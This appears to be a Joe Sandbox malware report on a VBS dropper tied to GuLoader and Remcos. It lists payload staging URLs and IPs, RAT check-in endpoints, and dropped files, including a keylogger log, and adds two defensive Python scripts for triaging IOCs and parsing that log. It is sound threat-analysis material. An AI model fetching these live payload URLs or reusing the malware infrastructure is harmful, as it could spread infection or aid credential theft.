http://103.237.86.247/F | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gprv | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligste.xsnP | powershell.exe, 00000002.00000002.2570518162.000002848CE9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmel | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 0000000A.00000002.3384928445.0000000021330000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligste | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237. | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | bhvEF08.tmp.14.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.237.8 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmelig | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.2 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpM | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86. | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | wab.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligste.xsnXRbl038 | powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2515114212.0000000005221000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.237H | powershell.exe, 00000002.00000002.2570518162.000002848EA98000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/qOreedem137.bin) | wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/ | bhvEF08.tmp.14.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpa | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpf | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.imvu.compData | wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2570518162.000002848DF0F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpm | wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://www.imvu.com | wab.exe, wab.exe, 00000010.00000002.2589737343.000000000376D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=wsb | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.237.86.247/Fremmeligs | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremm | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
http://103.237.86.2 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremme | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/ | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.24 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligste.xs | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fr | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fremmeligst | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | bhvEF08.tmp.14.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | wab.exe | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2570518162.000002848CC71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.23 | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Fre | powershell.exe, 00000002.00000002.2570518162.000002848E519000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.237.87.156 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
103.237.86.247 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | false
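The memory-string table above is noisy in a way that matters for IOC extraction: the same staging URL on 103.237.86.247 appears dozens of times as prefix-truncated fragments (http://103.2, http://103.237.86.247/Fr, .../Fremmeligste.xsnP, .../Fremmeligste.xsnXRbl038), the geoplugin.net check-in carries one or two trailing bytes of adjacent memory (json.gprv, json.gpM, json.gpa), and every row is rated "safe" by URL reputation even though the IP table marks 103.237.87.156 malicious. The Python below is an added example, not part of the Joe Sandbox report: it drops fragments that are prefixes of longer ones, merges fragments that diverge only in a few trailing bytes into their common prefix, attributes each cluster to its source processes, and joins the result against the IP table. The row list, the IP verdicts and the geoplugin.net prefix are constructed subsets of this page's tables; the verdict labels (block, hunt, rat-checkin, review), the 0.8 merge ratio and the SCRIPT_HOSTS set are my own choices.

```python
"""Consolidate truncated memory-string URLs into hunt-ready IOCs.

Added example; it is not part of the Joe Sandbox report. The rows and the
IP verdicts below are a constructed subset of the tables on this page.
"""
import re
from urllib.parse import urlsplit

# (name, source process) pairs taken from the "URLs from memory" rows above.
MEMORY_STRINGS = [
    ("http://103.237.86.247/Fremmeligste.x", "powershell.exe"),
    ("http://103.237.86.247/Fremmeligste.xsnP", "powershell.exe"),
    ("http://103.237.86.247/Fremmeligste.xsnXRbl038", "powershell.exe"),
    ("http://103.237.86.247/Fr", "powershell.exe"),
    ("http://103.237.86.247", "powershell.exe"),
    ("http://103.237", "powershell.exe"),
    ("http://103.2", "powershell.exe"),
    ("http://103.237.86.247/qOreedem137.bin)", "wab.exe"),
    ("http://geoplugin.net/json.gprv", "wab.exe"),
    ("http://geoplugin.net/json.gpM", "wab.exe"),
    ("http://geoplugin.net/json.gpa", "wab.exe"),
    ("https://contoso.com/License", "powershell.exe"),
    ("https://aka.ms/pscore6lB", "powershell.exe"),
    ("https://www.office.com/", "bhvEF08.tmp.14.dr"),
]
# Sandbox verdict per contacted address, from the IP table above.
IP_TABLE = {"103.237.87.156": True, "103.237.86.247": False, "178.237.33.50": False}
# Check-in endpoint that the context tables tie to every Remcos sample listed.
RAT_CHECKIN_PREFIXES = ("http://geoplugin.net/json.gp",)
# Processes whose fetches from a raw IP are worth hunting (my choice).
SCRIPT_HOSTS = {"wscript.exe", "powershell.exe", "wab.exe"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def lcp(a: str, b: str) -> str:
    """Longest common prefix of two strings."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return a[:n]


def collapse(urls, min_ratio: float = 0.8):
    """Reduce fragments to clusters of (stable_prefix, members).

    1. A fragment that is a strict prefix of another fragment is dropped.
    2. Adjacent (sorted) survivors that share scheme, host and most of the
       path, diverging only in a few trailing bytes, are merged; the cluster
       keeps their common prefix and the divergent tails count as memory noise.
    """
    urls = list(urls)
    maximal = sorted(u for u in set(urls)
                     if not any(v != u and v.startswith(u) for v in urls))
    clusters = []
    for u in maximal:
        if clusters:
            prefix, members = clusters[-1]
            p = lcp(prefix, u)
            root = "{0.scheme}://{0.netloc}/".format(urlsplit(u))
            if len(p) > len(root) and len(p) / min(len(prefix), len(u)) >= min_ratio:
                clusters[-1] = (p, members + [u])
                continue
        clusters.append((u, [u]))
    return clusters


def triage(rows, ip_table):
    """Return one IOC record per URL cluster plus one per flagged address."""
    by_url = {}
    for url, source in rows:
        by_url.setdefault(url, set()).add(source)
    iocs, seen_hosts = [], set()
    for prefix, members in collapse(by_url):
        sources = set().union(*(by_url[m] for m in members))
        host = urlsplit(prefix).hostname or ""
        seen_hosts.add(host)
        if ip_table.get(host):
            verdict = "block"          # sandbox marked the address malicious
        elif prefix.startswith(RAT_CHECKIN_PREFIXES):
            verdict = "rat-checkin"    # legitimate service, known RAT beacon
        elif IPV4.match(host) and sources & SCRIPT_HOSTS:
            verdict = "hunt"           # script host pulling from a raw IP; AV "safe" is not evidence
        else:
            verdict = "review"
        iocs.append({"url": prefix, "host": host, "exact": members == [prefix],
                     "sources": sorted(sources), "verdict": verdict})
    # A C2 address often exists only in the config, never as a URL string.
    for host, malicious in ip_table.items():
        if malicious and host not in seen_hosts:
            iocs.append({"url": None, "host": host, "exact": True,
                         "sources": [], "verdict": "block"})
    return iocs


if __name__ == "__main__":
    for ioc in triage(MEMORY_STRINGS, IP_TABLE):
        flag = "" if ioc["exact"] else " (truncated in memory)"
        print(f'{ioc["verdict"]:<12} {ioc["url"] or ioc["host"]}{flag}  <- {", ".join(ioc["sources"])}')
```

An IOC record with exact set to False means the stored string was cut or had foreign bytes appended; publish the host and the stable prefix, not the fragment tails, and confirm the real path from the PCAP rather than from these strings.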
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465862
Start date and time: 2024-07-02 07:48:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SOA.vbs
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winVBS@19/14@1/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 175
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3516 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5512 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:48:51 | API Interceptor | 1x Sleep call for process: wscript.exe modified
01:48:53 | API Interceptor | 136x Sleep call for process: powershell.exe modified
01:50:06 | API Interceptor | 881090x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | HUED23EDE5UGRFQ.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | tWitaq427K.exe | malicious | Remcos, AgentTesla | geoplugin.net/json.gp
178.237.33.50 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Offer ZI-0428.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | cKiTq7RRCn.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
103.237.86.247 | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
103.237.86.247 | Payment Copy.vbs | malicious | Remcos, GuLoader | 103.237.86.247/JrFdfe171.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
geoplugin.net | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BGNR-AP2BainandCompanySG | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | Payment Copy.vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | YHZb2CeJdY.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | lVlJfRiCLE.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | TKX7tZs372.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | 3B3W5byB4W.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | jkeqHGu4is.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | teb6nb8nmu.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | n7h2Ze4ezf.elf | malicious | Mirai | 103.237.86.195
BGNR-AP2BainandCompanySG | bot.x86-20240414-2238.elf | malicious | Mirai | 103.237.86.195
ATOM86-ASATOM86NL | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
ATOM86-ASATOM86NL | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Offer ZI-0428.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | cKiTq7RRCn.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 178.237.33.50
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: modified
Size (bytes): 242
Entropy (8bit): 3.555604565284536
Encrypted: false
SSDEEP: 6:6lVr2c5YcIeeDAl/bdlrYSWn+SkgI9lAIWAv:6lVrBecFbdpYS5s4lPW+
MD5: ACD8313F9AE3FCF7398BF4D97C33962F
SHA1: 79B3F43258E342AB078A31347E6C41AA332993AE
SHA-256: 08B550FA25225ED8B455B51559A967FAD807C817FA596E9CCB1DD58AF06C7C16
SHA-512: F345CA855A30203FF94C780D0354BFB623CE44B6C5F54BAF3CF47D5597A3D4AB0B91C6FCDFA2C15F8143AB6D4A7236B6B92F7597E24ED89E90328EA5691DF027
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
                  Preview:....[.2.0.2.4./.0.7./.0.2. .0.1.:.4.9.:.3.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.w.i.n.d.o.w.s. .m.a.i.l.\.w.a.b...e.x.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
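The record above is the Remcos offline keylogger log, C:\ProgramData\remcos\logs.dat, as written by the injected wab.exe. Its preview is UTF-16LE text with no BOM (each "." is a NUL byte or a CR/LF): a CRLF, one bracketed timestamped event, then bracketed window-title markers separated by blank lines. The Python below is an added example, neither part of the report nor Remcos code. It rebuilds the file from that preview, parses it into events and window markers, and attributes any free text after a marker to that window as captured keystrokes. The reconstruction reproduces the record's size (242 bytes) and 8-bit entropy (3.5556), which is a useful check that the preview was read correctly; the MD5 is printed for the same comparison. The assumption that keystrokes follow a title marker as free text is mine: this page shows only markers, and the encoding Remcos uses for special keys is not visible here.

```python
"""Parse the Remcos offline keylogger log (logs.dat) shown above.

Added example; it is neither part of the report nor Remcos code. SAMPLE is
reconstructed from the record's preview: UTF-16LE text, no BOM, where each
'.' in the preview stands for a NUL byte or a CR/LF.
"""
import hashlib
import math
import re
from collections import Counter

SAMPLE = (
    "\r\n[2024/07/02 01:49:34 Offline Keylogger Started]\r\n\r\n"
    "[C:\\Program Files (x86)\\windows mail\\wab.exe]\r\n\r\n"
    "[Program Manager]\r\n"
).encode("utf-16-le")

# Either a bracketed header or a run of free text up to the next bracket.
TOKEN = re.compile(r"\[(?P<head>[^\]]*)\]|(?P<keys>[^\[]+)")
STAMP = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)$")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the figure the report lists per dropped file."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def decode_log(data: bytes) -> str:
    """Remcos writes UTF-16LE; tolerate a BOM in case a variant prepends one."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def parse_log(data: bytes) -> list:
    """Walk the log in order.

    A bracketed line that starts with a timestamp is an event; any other
    bracketed line is taken as a window-title marker, and free text up to the
    next bracket is attributed to that window as captured keystrokes
    (assumption: the page shows markers only, and the encoding Remcos uses
    for special keys is not visible here).
    """
    records = []
    for m in TOKEN.finditer(decode_log(data)):
        head = m.group("head")
        if head is not None:
            s = STAMP.match(head)
            if s:
                records.append({"kind": "event", "time": s.group(1), "text": s.group(2)})
            else:
                records.append({"kind": "window", "title": head, "keys": ""})
        else:
            keys = m.group("keys").strip()
            if keys and records and records[-1]["kind"] == "window":
                records[-1]["keys"] += keys
    return records


def summarize(data: bytes) -> dict:
    """File facts plus the parsed timeline, as a triage note would need them."""
    records = parse_log(data)
    return {
        "size": len(data),
        "entropy": round(shannon_entropy(data), 4),
        "md5": hashlib.md5(data).hexdigest(),   # compare with the record's MD5
        "started": [r["time"] for r in records
                    if r["kind"] == "event" and r["text"] == "Offline Keylogger Started"],
        "windows": [r["title"] for r in records if r["kind"] == "window"],
        "keystrokes": {r["title"]: r["keys"] for r in records
                       if r["kind"] == "window" and r["keys"]},
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

On a live host the same parser runs over C:\ProgramData\remcos\logs.dat pulled with the UTF-16LE bytes intact; the "started" timestamp gives the earliest point from which typed credentials must be considered captured, and the window list tells you which applications were in focus while the log was open.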
Process: C:\Windows\System32\wscript.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Reputation: moderate, very likely benign file
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
Process: C:\Windows\System32\wscript.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.131891476939675
Encrypted: false
SSDEEP: 6:kKKgMD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:SgdDnLNkPlE99SNxAhUe/3
MD5: AC5A3DCE1DF65390C634B92185C478FC
SHA1: BA58A1B4D689FBF6159D4704E71CC0996B1195BF
SHA-256: 8EE280067AEB4E116085B0EA1B49ABB18F29E586D8019B0488528370615422BD
SHA-512: E8F7291090320D200067E35BBAAB4BB72477D834DDC779690F8BA91F8195F941145C880BBA63081A977C5524AA8B03C03A0450D9B0E45A53709A2511227A45B2
Malicious: false
                  Preview:p...... ..........v.C...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
